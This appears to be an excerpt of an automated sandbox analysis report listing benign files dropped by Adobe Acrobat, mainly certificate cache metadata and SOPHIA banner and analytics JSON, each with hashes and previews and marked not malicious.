                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):192
                                                                          Entropy (8bit):2.7673182398396405
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFkluvbbNl1fllXlE/HT8kCNNX8RolJuRdxLlGB9lQRYwpDdt:kK3vVQT8hNMa8RdWBwRd
                                                                          MD5:0EDDABEA1A4DEEAF9968EAE9A11406A1
                                                                          SHA1:DF7D8CABF5A835F8A3E8095D1BE355F858C2C7EF
                                                                          SHA-256:F42277DBD3EA4805BAB5491DE55F986ECAE712C2E5D0960322CC40E7DF68E731
                                                                          SHA-512:3D5BA4BE187AACEB2C47A1977EBC1940E0D3AEF2064A24659143024D7CEFF27228D33E7FEFD4056D3A1A64036C47F5C321476FE41771F0ECF727ED76D1DEA5DD
                                                                          Malicious:false
                                                                          Preview:p...... ............7U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):328
                                                                          Entropy (8bit):3.2478978672539016
                                                                          Encrypted:false
                                                                          SSDEEP:6:kK5bNF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hbqDImsLNkPlE99SNxAhUe/3
                                                                          MD5:537BA9355A62C9F0A1257D31E0F45290
                                                                          SHA1:900EDE94CEEE26726DA4509D8731B4AC88E0C396
                                                                          SHA-256:EF65F4C699ECF39D3D768C74289AC50612CEC40D2C5F9BCAFF79CA8F038BB1DB
                                                                          SHA-512:6B199559814383C2AED5B445CA279BE1477D58169BC935525C17295FCBD48BDC733147E2CC30E5A7E1E3F3FF61CAEEAF8A2C0C5E309B0A624D29C495E86F4210
                                                                          Malicious:false
                                                                          Preview:p...... ........_.R.7U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.301770223587704
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJM3g98kUwPeUkwRe9:YvXKXFvEAvR/ZwHAmOGMbLUkee9
                                                                          MD5:F9BB69312AD481FE9D4D2480535CEA47
                                                                          SHA1:EABBC2F97E310974E318B0D73856FE0108201F29
                                                                          SHA-256:A91C5548568000C4E094FE2BA4C80110BE72D153D630BAB7D4AEBDCACBC11B8D
                                                                          SHA-512:9A1D579CDE20331A02C09D7122DF8DB9F25D5BF7799475415332D313B4D3B0DD79B4B6D98DF8E2B30C05B564494935F181AAAA82044BA86866BBC4FCDFB6EA7F
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.232395490985208
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfBoTfXpnrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGWTfXcUkee9
                                                                          MD5:E85CF7BA012380AB3EB658DB7B008D3E
                                                                          SHA1:E81D4BF6994E73273ACCC263C66066130DA3052D
                                                                          SHA-256:9CBF45DB7B66CF4588CB817B7EAD047309D3021361CE7B40B5E4094665D8814F
                                                                          SHA-512:83414B1339C47EB8D5FD83B0963199D274303E8A2CCB171B8B0C78E65ED253666FBF2E8A6B0970C5FF8BA1D2470BCF15D90B6C1B7735878B335E18A008A546B7
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.211720413823802
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfBD2G6UpnrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGR22cUkee9
                                                                          MD5:8434A6FA436F34D7128EF7072162CFAC
                                                                          SHA1:25C5427406A20BC90D7308611ED59D1BCCE954C6
                                                                          SHA-256:828E5D51148F1CAD6DCC1DF81D61B5419DF932F9F7AED8702C93329625538971
                                                                          SHA-512:2ADCCA721640FFA3FEFEF78CD82325158A58AB5F30FCE9A98E31414DC46D5ACD3DD80E7835AB38CA71DC4CE888D20FB06E36593539F10FA7DFDE3B7DA3E3F837
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):285
                                                                          Entropy (8bit):5.276557606528456
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfPmwrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGH56Ukee9
                                                                          MD5:417A2253F1EB22A35DF2AB29B9D002D3
                                                                          SHA1:35527630E91D18183D809A114D55ECFD6D5FEDF8
                                                                          SHA-256:414720E8047720CB07FF6FBF317E55ED74BFE35120E3DF7AFA7CDB1EB449D49E
                                                                          SHA-512:B6467051F98604BAB97FB7953EE351DADE74A362319690D8986063781CCD9D6B3798808A14CA7BABB7FDFC7CC5932BF17ED4F086A607375FB99476803CC7E339
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1123
                                                                          Entropy (8bit):5.680772863226193
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XRTJha7pLgE9cQx8LennAvzBvkn0RCmK8czOCCSGj:Yv6TJhChgy6SAFv5Ah8cv/c
                                                                          MD5:8163C2789C6A097225B1E6ED41901731
                                                                          SHA1:5508BB4315E538CE41C67ECEB8909044F0278817
                                                                          SHA-256:10EF68DC162F5B34504835FE89BF8E473A9785E0C0FB57323692C2C1A1867115
                                                                          SHA-512:F17ADD96839A11763C7D6134F8F1E4AA65CC34AA893691A1CA0198E8A4CDFA032BFD620D4C0DFA16E0DF29D87FBF679254D4A0DD3AA93E283A36AD2EC1E67987
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.219938230551994
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJf8dPeUkwRe9:YvXKXFvEAvR/ZwHAmOGU8Ukee9
                                                                          MD5:1B4D022814572837677BC242A66CC240
                                                                          SHA1:794E42924CD9473A339C5AB26C0194AFEB901E52
                                                                          SHA-256:03564B036EF59F3AF0E54B6AE86D382504B9D262ABE40CC60AFE35FBC2CFC5BC
                                                                          SHA-512:AE34DFCC93C45A230EDBD392AD14972FCB1A1A80046C44300F1CB45A7DCE2AD8750B6C7451C9B5C20F7DFAD737416173FA5A0B6C1B4591E6EC96C2D9F7E218B4
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.218932451814059
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfQ1rPeUkwRe9:YvXKXFvEAvR/ZwHAmOGY16Ukee9
                                                                          MD5:286B13FAE7BA60D45734247B1E6F4A00
                                                                          SHA1:3795458826251FD8FE6E9E799D267045ECCCFF5C
                                                                          SHA-256:739E45EF37482F27F3BB7F2CB5245F4CFB992DB34E33D20B0E4E9E3BDB5F4987
                                                                          SHA-512:5D33EC94B33636C5F4DA1FFD20C9E92BB87873421C7907ED021D5AEDB1A1713944A18E98870AB40288941A0FE5A2D5F4E877145144BDCC17A1A2596706B6B334
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.233569907562903
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfFldPeUkwRe9:YvXKXFvEAvR/ZwHAmOGz8Ukee9
                                                                          MD5:F97032355FAD5F1F0B771DFFF4DE7AEB
                                                                          SHA1:41D192A1A7EFB9D2A46AEF6CAA68CA7F46648924
                                                                          SHA-256:6EAF8FFAFB4F3DD9491AB389ED1F16386E8A885D805D7AB0C12D7D04A6B3ADB5
                                                                          SHA-512:AB931B2EC0D46EFE6AC0F6D814A5D5197E96B06A9DC87109037E4C3464FCC00B7D461F17A73630B2B2273F58C264938F00F202409592592B0BE6234EE666D167
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.248282937539186
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfzdPeUkwRe9:YvXKXFvEAvR/ZwHAmOGb8Ukee9
                                                                          MD5:C7F53074C3E281005E4B65CA00868EED
                                                                          SHA1:D434638A76823D57C2F99F3C001AF4DF6A379B9A
                                                                          SHA-256:DCE4FCB881218656E9CAFC3E331D8EDA2DB7B99D98D8EF068F58673CC9026E56
                                                                          SHA-512:2AD66200C09BA3011C1DF5E6E83A826087F39E36EC51C9F9539C1EDB71FFF10B26B924D9808646666A2A1D42928070B66F9309741A5293D0FBAA95C8FCC88322
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.227991293867672
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfYdPeUkwRe9:YvXKXFvEAvR/ZwHAmOGg8Ukee9
                                                                          MD5:CECE4FAC513497D3F85FCC304EAD6DAF
                                                                          SHA1:BECAC936B01B212E29B8FE790D2AAB8CC0CD94AB
                                                                          SHA-256:267DABC0CECA56C84F6F8BB61848E236F1226ABEF9378C60C349C3107BAE8D52
                                                                          SHA-512:AED1EF7B8A7FEE0B830F9F8BB3C149C45B43BACC9A8043717A0CFEABE0D4A7E238B6E603D88F29BCAB0F8CDE209286BD11FCF479C55F11977D68AE80E5F0E29C
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):284
                                                                          Entropy (8bit):5.213876850312692
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJf+dPeUkwRe9:YvXKXFvEAvR/ZwHAmOG28Ukee9
                                                                          MD5:0F370A8E4ACD5715BF60171360689EBD
                                                                          SHA1:A9E17145769BAD5BA50C81DDC602BE685064129C
                                                                          SHA-256:6C8E54516558D8C07E88148003FEB10B6CDAFE2D03D07FA25C2205BC1D519F52
                                                                          SHA-512:9E7A2C11CD35CA40B567AFF73A897735532E737BF2B1C44F18B762C092A494CCA7E07C109CCA3043EE12EFE5C467CEF131DF8BB90BA984D12B34CB4FAE019C12
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.212033296738322
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfbPtdPeUkwRe9:YvXKXFvEAvR/ZwHAmOGDV8Ukee9
                                                                          MD5:9F40A9AA284AA9FF88B1DA04569455C3
                                                                          SHA1:70D181EAFE7D2ED7EA793C493837D691054F7020
                                                                          SHA-256:72E5353ABACF1C8998A26BCD47CC0C1B34175385C943EC5DA44C0F52FAEE2D0B
                                                                          SHA-512:B065CBEF1529D26597D45650C80E9AD5CCCC917D6ACE076AF6352A6239CD8B780ECEAFAB9065379F37DC72CC806D7AF2AFBAB9D5FF1981DF2ADBAABDE7E1AB76
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):287
                                                                          Entropy (8bit):5.210654814705667
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJf21rPeUkwRe9:YvXKXFvEAvR/ZwHAmOG+16Ukee9
                                                                          MD5:32BDDB9CEB1D886075DD460A2FFF1CDE
                                                                          SHA1:CA82190510C8ED002BA206E0B41CB90BB60713E3
                                                                          SHA-256:1C088CD41FCDEC6898138441C82EF83B7DA01E40C3A8E8DC1CB0C13292F92771
                                                                          SHA-512:95DB28023E3B1A675EFB63249C78AB50901E0FF78240CE1A196D8228D3FBB81A17EB86A285354822FB186C6E04CD7C6183E6D81217482D76BB492DA1CBF87F59
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1090
                                                                          Entropy (8bit):5.658958462452422
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XRTJha7amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSGj:Yv6TJhgBgkDMUJUAh8cvMc
                                                                          MD5:976672152259268DFCD73EAF1D18CA0B
                                                                          SHA1:EE6B2E2DEE2F78009590D37E28906A6F154CB0C6
                                                                          SHA-256:CE9599772D492497217583A91AEE05362524FBBCC95AF5CA781C232C6A4F2F03
                                                                          SHA-512:5B67270014F553B889E2EA3E52846B47C95EBD3DF843CB6FCB41E6F177C31939FC30EBDB9CBA91B7851292DA52E23A81EDF602AF3318ABC25CF3B3A132D38B26
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.184385689065375
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfshHHrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGUUUkee9
                                                                          MD5:E9770DF3DCF72388B2F477478FE43285
                                                                          SHA1:A7A82F1B8B54F6B5D085C936BC74A6DABE9AED02
                                                                          SHA-256:B731771D4E5E0FE90219B3F6E31F9E185FD434E3C7261455F2D8D8BF6A0517FE
                                                                          SHA-512:7F7053F6486426E7D85C8DE4E364C43F3D351E34DE0432AE017F18B965F17F4A66FE21AE572E29EE543B1CC9C1C29FB17FA6C93CCC7C759AC92F17B235D3513F
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):282
                                                                          Entropy (8bit):5.208254827292123
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJTqgFCrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGTq16Ukee9
                                                                          MD5:A351ADEF8EBF8A928DDEA3DEBBB68E1C
                                                                          SHA1:F41D10CF2BD059CB468AB5779A3BAF46C5BC319E
                                                                          SHA-256:FF706AF1751906E1C462875A042BE4267E3BFE5097C4AE8F0C7E5C949085FE06
                                                                          SHA-512:4A660F0A7C920769BC00AA4077133B64F23FE740923E054C61465291DC39F1C88AFFB7CDBD3D2F7D8A65ACCCFCFBC5A9B173DED8E1EC3DB780A2FBC3A59FDE21
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:e:e
                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                          Malicious:false
                                                                          Preview:....

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2814
                                                                          Entropy (8bit):5.140993373996544
                                                                          Encrypted:false
                                                                          SSDEEP:24:Ype3YvGaO4ay3vQ8vWBNnoPvJudTv3bXm3BYvwSYvoALvPjd7nvj0SRvfJqEvC2r:YYLBNcudHW3/dPy/Nc5GMeaJtaCh93j
                                                                          MD5:7A6925C670D7014E0DA0D4FF09BA721E
                                                                          SHA1:066DA5957A92F37378ABD7CBD87F951EFC124C75
                                                                          SHA-256:8BBF78D0556418B2FA1BB3792EFDD8F0A1A30F1CCDD99FEDEA88A15FBA300E07
                                                                          SHA-512:4A3B6270852E579E4985E836C8BB582EFFE19397D519EE99F633759C0C5946E6F42B2ABDF4781BC606C56ABCD801FBFE02144B33FCC60A78AD40D624F4A83614
                                                                          Malicious:false
